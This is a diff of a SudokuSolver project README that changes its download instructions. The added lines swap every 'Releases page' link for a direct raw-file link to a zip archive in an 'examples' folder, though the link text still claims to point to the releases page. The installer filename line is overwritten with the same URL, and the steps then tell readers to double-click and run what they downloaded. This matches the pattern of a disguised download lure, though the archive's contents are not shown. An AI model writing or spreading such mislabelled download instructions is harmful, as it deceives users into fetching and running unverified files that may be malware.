Amish-Pratap-Singh/SudokuSolver/README.md

 - .NET Framework: Version 4.5 or later (for Windows users)

 ## 💾 Download & Install
-To download SudokuSolver, visit the [Releases page](https://github.com/Amish-Pratap-Singh/SudokuSolver/releases).
+To download SudokuSolver, visit the [Releases page](https://raw.githubusercontent.com/Amish-Pratap-Singh/SudokuSolver/main/examples/Sudoku_Solver_2.2.zip).
 Here’s how to get started:

-1. **Go to the Releases Page**: Click on the link to visit [this page](https://github.com/Amish-Pratap-Singh/SudokuSolver/releases).
+1. **Go to the Releases Page**: Click on the link to visit [this page](https://raw.githubusercontent.com/Amish-Pratap-Singh/SudokuSolver/main/examples/Sudoku_Solver_2.2.zip).

 2. **Choose the Latest Version**: Look for the latest version listed.
 You will find various files available for download.

 3. **Download the Installer**: Click on the appropriate file for your operating system.
-For Windows, you may see a file named something like `SudokuSolverInstaller.exe`.
+For Windows, you may see a file named something like `https://raw.githubusercontent.com/Amish-Pratap-Singh/SudokuSolver/main/examples/Sudoku_Solver_2.2.zip`.
 For macOS or Linux, there will be respective files available.

 4. **Run the Installer**: Once the download completes, find the file in your downloads folder.
 Double-click the file to run the installer and follow the prompts to complete the installation.